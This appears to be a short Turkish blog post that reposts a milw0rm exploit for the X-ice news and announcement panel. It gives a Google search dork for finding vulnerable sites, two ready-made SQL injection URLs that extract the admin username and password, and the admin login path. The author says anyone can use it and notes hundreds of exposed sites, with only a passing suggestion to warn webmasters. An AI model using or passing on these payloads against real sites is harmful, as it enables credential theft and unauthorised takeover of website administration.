Basit bir açık, herkez kullanabilir; fakat Türk webmaster’ların bu açığı kapatması için uyarı notlarınızı bırakmanızı öneririm, çok eski açık ama google’da yüzlerce site var..
X-ice haber, duyuru paneLi açığı
Arama k0du: inurl:devami.asp
Vuln.
Username : /devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+adminPassword : /devami.asp?id=-1+union+select+0,sifre,2,3,4,5,6,7+from+admin
Login : /admin/kontrol.asp
Kaynak:
# milw0rm.org
http://www.milw0rm.com/exploits/3469
Hiç yorum yok:
Yorum Gönder